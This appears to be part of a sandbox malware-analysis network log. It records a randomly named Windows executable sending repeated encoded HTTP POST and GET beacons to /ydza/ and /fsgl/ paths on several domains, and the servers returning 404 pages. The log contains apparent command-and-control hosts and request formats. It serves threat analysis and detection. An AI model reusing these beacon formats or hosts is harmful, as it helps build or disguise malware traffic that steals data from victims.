                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.taxitayninh365.site
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 56 53 72 73 51 4a 31 51 6e 70 6b 71 72 5a 64 66 68 42 55 77 35 79 73 5a 2f 75 76 75 53 79 37 6f 6b 7a 69 70 36 2f 46 69 61 72 47 52 31 44 33 41 55 2f 44 48 65 52 78 31 4e 78 4f 36 45 55 2f 6e 54 33 71 41 32 4e 72 46 72 71 41 6a 42 5a 6a 4a 74 36 56 52 4d 76 6f 39 70 74 6c 76 42 74 49 6b 43 42 77 32 53 5a 62 41 63 32 33 78 2b 38 54 58 58 45 6e 58 48 59 58 30 65 6b 56 74 4f 64 63 41 51 53 4d 76 58 45 62 78 55 30 5a 33 34 36 69 52 30 55 63 4d 67 70 30 57 2b 35 6b 45 7a 44 65 4b 6c 61 43 57 56 72 43 79 58 72 51 6d 33 76 2b 61 59 4a 5a 53 42 44 39 56 47 34 4a 68 43 68 32 6b 77 69 53 34 2f 45 4d 3d
                                                                                Data Ascii: PLpD=VSrsQJ1QnpkqrZdfhBUw5ysZ/uvuSy7okzip6/FiarGR1D3AU/DHeRx1NxO6EU/nT3qA2NrFrqAjBZjJt6VRMvo9ptlvBtIkCBw2SZbAc23x+8TXXEnXHYX0ekVtOdcAQSMvXEbxU0Z346iR0UcMgp0W+5kEzDeKlaCWVrCyXrQm3v+aYJZSBD9VG4JhCh2kwiS4/EM=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.550011103.75.185.22803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:05.598521948 CET816OUTPOST /ydza/ HTTP/1.1
                                                                                Host: www.taxitayninh365.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.taxitayninh365.site
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 56 53 72 73 51 4a 31 51 6e 70 6b 71 6b 5a 4e 66 6b 6d 41 77 6f 53 73 61 7a 4f 76 75 59 53 36 6a 6b 7a 75 70 36 37 56 49 5a 5a 79 52 30 6a 48 41 56 36 33 48 5a 52 78 31 44 52 4f 2f 5a 6b 2f 75 54 33 6d 69 32 4d 58 46 72 71 55 6a 42 62 72 4a 73 4a 39 4f 4f 2f 6f 7a 38 39 6c 74 4d 4e 49 6b 43 42 77 32 53 5a 50 2b 63 32 76 78 2b 4a 44 58 58 6e 2f 55 45 59 58 72 5a 6b 56 74 46 39 63 2b 51 53 4e 49 58 46 57 57 55 32 78 33 34 36 53 52 30 46 63 4c 70 70 30 51 36 35 6c 36 2b 67 62 4f 6f 4a 65 70 4a 71 76 61 4f 59 59 4f 32 5a 50 77 43 72 52 36 53 6a 52 74 57 72 42 57 54 52 58 4e 71 42 43 49 68 54 59 52 75 74 6b 6b 2b 43 4e 52 67 51 6d 49 63 63 47 58 31 41 56 34
                                                                                Data Ascii: PLpD=VSrsQJ1QnpkqkZNfkmAwoSsazOvuYS6jkzup67VIZZyR0jHAV63HZRx1DRO/Zk/uT3mi2MXFrqUjBbrJsJ9OO/oz89ltMNIkCBw2SZP+c2vx+JDXXn/UEYXrZkVtF9c+QSNIXFWWU2x346SR0FcLpp0Q65l6+gbOoJepJqvaOYYO2ZPwCrR6SjRtWrBWTRXNqBCIhTYRutkk+CNRgQmIccGX1AV4


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.550012103.75.185.22803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:08.260205984 CET1833OUTPOST /ydza/ HTTP/1.1
                                                                                Host: www.taxitayninh365.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.taxitayninh365.site
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 56 53 72 73 51 4a 31 51 6e 70 6b 71 6b 5a 4e 66 6b 6d 41 77 6f 53 73 61 7a 4f 76 75 59 53 36 6a 6b 7a 75 70 36 37 56 49 5a 5a 4b 52 30 51 2f 41 55 5a 66 48 59 52 78 31 64 42 4f 2b 5a 6b 2b 73 54 7a 43 6d 32 4d 61 77 72 75 6b 6a 41 2b 6e 4a 72 38 42 4f 48 2f 6f 7a 2b 39 6c 73 42 74 49 78 43 42 67 79 53 5a 66 2b 63 32 76 78 2b 4f 37 58 41 6b 6e 55 49 34 58 30 65 6b 55 69 4f 64 63 46 51 55 6c 79 58 46 54 68 55 48 52 33 34 61 43 52 35 58 30 4c 78 35 30 53 39 35 6c 79 2b 6e 54 42 6f 4a 44 59 4a 71 61 78 4f 59 67 4f 30 73 57 2f 5a 66 4a 6a 48 53 4e 73 59 5a 6c 4a 47 6b 50 52 6c 54 4f 65 70 77 6b 53 79 64 4a 48 35 6b 68 50 6b 79 37 53 47 5a 4b 69 31 77 73 37 59 46 31 77 2b 50 4a 76 57 56 6c 64 67 43 67 57 4e 57 69 38 65 5a 4f 2f 47 78 72 44 74 64 74 4a 71 37 4e 77 2f 57 65 31 48 74 61 37 6a 45 79 4b 48 57 70 48 59 5a 78 35 57 4d 6f 72 74 68 49 6d 34 33 6d 5a 69 4f 49 66 70 78 59 4e 75 39 48 4c 67 64 44 72 31 43 2f 47 45 5a 59 63 36 65 63 51 4c 50 78 33 78 39 47 72 6c 41 4f 71 79 55 53 6c 53 [TRUNCATED]
                                                                                Data Ascii: PLpD=VSrsQJ1QnpkqkZNfkmAwoSsazOvuYS6jkzup67VIZZKR0Q/AUZfHYRx1dBO+Zk+sTzCm2MawrukjA+nJr8BOH/oz+9lsBtIxCBgySZf+c2vx+O7XAknUI4X0ekUiOdcFQUlyXFThUHR34aCR5X0Lx50S95ly+nTBoJDYJqaxOYgO0sW/ZfJjHSNsYZlJGkPRlTOepwkSydJH5khPky7SGZKi1ws7YF1w+PJvWVldgCgWNWi8eZO/GxrDtdtJq7Nw/We1Hta7jEyKHWpHYZx5WMorthIm43mZiOIfpxYNu9HLgdDr1C/GEZYc6ecQLPx3x9GrlAOqyUSlSq9B9Ljps2FGcTdGnJKJ0slzm08xH0fftGvxy40iphrPTkreeKRSrzQxo6nwDpPsQz+FzJcR03lDXOHhRjTSt526cGwNtVSDaorKCbmQw6y+3ejnB+036DPEcrRGN4cNAIKWB4fkX2g3KMraTaguny/7Fo/lq0AS68XUbUOOB/QwMJZ6/mzps3h9oH+gvthI+yFtoAAgec8P+P2se6I9644z0MuJ/B8CnbGPOvI1HCOTUVTkpP9oKm2Zy0xE5IBw5ZvX3R8x2Lsjs2ZPcsYtTZKt/pCdlh7LZhJLAGz+z+aY5LESa2g+tV6BrXtMVUtpM3ekOS41iqyDEAoyyJCAOYBNH0Frb2kxkhqbMX2T27L/gG4/lAojWQVGcepMtzXwIAv+2G+okDFDhLhV/pGy7M0HKL4xIzK8gao6alF9maLuc2JM+ltHE6BVdagxQpAkmscidljrHuo9mTgq7W/1tols2DP5pFakScoBhsgw7oLVwo+TLtZgz3JS2mxnmf/0BxjsCNFapzSjEZHd/RwRmWArK+NKzdlkF+e0AnKpEg8XxWyJa8SpZBpWkGtSnEWXXnnl83nsnp9z02cWRycMXcc4tdP6t3QGpaKtaammO4wW8uiKdv63R/TQ4FnKihVb1aGQSkehePaW9ZjdPpTH2viT7rfBrMPPFWH [TRUNCATED]
                                                                                Dec 3, 2024 14:16:09.858510971 CET1236INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1238
                                                                                date: Tue, 03 Dec 2024 13:16:09 GMT
                                                                                server: LiteSpeed
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                                Dec 3, 2024 14:16:09.858531952 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.550013103.75.185.22803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:11.032444954 CET527OUTGET /ydza/?PLpD=YQDMT/cjjLIrhYhTk0Qcn1c+4/vXTHer2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1BIA0voRLPdIJFDITNJjOTEnO/NX/dE7RBJTjciFlPthnKg==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.taxitayninh365.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:12.663497925 CET1236INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1238
                                                                                date: Tue, 03 Dec 2024 13:16:12 GMT
                                                                                server: LiteSpeed
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                                Dec 3, 2024 14:16:12.663518906 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.550014155.94.253.4803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:18.358870029 CET793OUTPOST /fsgl/ HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 50 2f 34 4d 45 53 37 2b 73 6d 57 6f 32 2b 43 47 51 41 4e 36 31 69 5a 56 72 67 59 61 49 78 39 59 4f 44 74 4b 63 71 33 57 38 4b 72 46 51 53 59 6c 38 4a 59 78 63 37 6c 64 53 72 45 46 4a 56 68 32 75 32 46 4e 79 34 41 64 78 76 70 41 61 6a 50 74 33 37 73 6e 72 48 4b 53 4c 42 61 33 67 62 30 71 71 51 48 67 38 61 76 51 2b 64 53 58 39 6a 71 57 4b 4a 55 4f 52 53 4c 6e 68 61 70 66 36 36 54 48 38 53 44 51 7a 4c 34 74 43 74 6e 45 63 4b 46 76 42 57 49 31 37 4d 33 7a 2b 49 6c 7a 70 68 5a 49 6c 70 37 48 55 43 65 32 52 62 7a 53 36 79 64 62 54 4d 49 31 5a 6d 59 36 6d 36 78 47 54 41 7a 4a 75 47 39 7a 63 45 51 3d
                                                                                Data Ascii: PLpD=P/4MES7+smWo2+CGQAN61iZVrgYaIx9YODtKcq3W8KrFQSYl8JYxc7ldSrEFJVh2u2FNy4AdxvpAajPt37snrHKSLBa3gb0qqQHg8avQ+dSX9jqWKJUORSLnhapf66TH8SDQzL4tCtnEcKFvBWI17M3z+IlzphZIlp7HUCe2RbzS6ydbTMI1ZmY6m6xGTAzJuG9zcEQ=
                                                                                Dec 3, 2024 14:16:19.609900951 CET1033INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:19 GMT
                                                                                server: LiteSpeed
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.550015155.94.253.4803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:21.024667025 CET813OUTPOST /fsgl/ HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 50 2f 34 4d 45 53 37 2b 73 6d 57 6f 32 66 79 47 44 54 6c 36 7a 43 59 6e 75 67 59 61 53 42 39 63 4f 44 78 4b 63 6f 48 47 2f 2f 44 46 51 33 6b 6c 39 4d 6b 78 66 37 6c 64 5a 4c 46 75 44 31 68 39 75 32 49 79 79 34 73 64 78 76 74 41 61 6a 66 74 33 4c 51 6b 70 58 4b 51 47 68 61 31 75 37 30 71 71 51 48 67 38 65 48 75 2b 64 61 58 38 54 61 57 4a 73 30 4a 59 79 4c 6f 72 36 70 66 74 4b 54 63 38 53 44 69 7a 50 68 4b 43 76 66 45 63 4b 31 76 42 45 77 30 73 63 33 31 36 49 6b 77 73 52 38 69 67 62 50 34 53 45 58 7a 4f 59 6e 32 32 6b 73 78 4a 75 41 64 4b 47 30 43 32 70 35 78 43 77 53 67 30 6c 74 44 43 54 46 70 2b 6a 37 52 71 59 34 44 32 69 5a 42 71 44 2b 4e 57 50 4d 5a
                                                                                Data Ascii: PLpD=P/4MES7+smWo2fyGDTl6zCYnugYaSB9cODxKcoHG//DFQ3kl9Mkxf7ldZLFuD1h9u2Iyy4sdxvtAajft3LQkpXKQGha1u70qqQHg8eHu+daX8TaWJs0JYyLor6pftKTc8SDizPhKCvfEcK1vBEw0sc316IkwsR8igbP4SEXzOYn22ksxJuAdKG0C2p5xCwSg0ltDCTFp+j7RqY4D2iZBqD+NWPMZ
                                                                                Dec 3, 2024 14:16:22.265120983 CET1033INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:22 GMT
                                                                                server: LiteSpeed
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.550016155.94.253.4803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:23.693845987 CET1830OUTPOST /fsgl/ HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
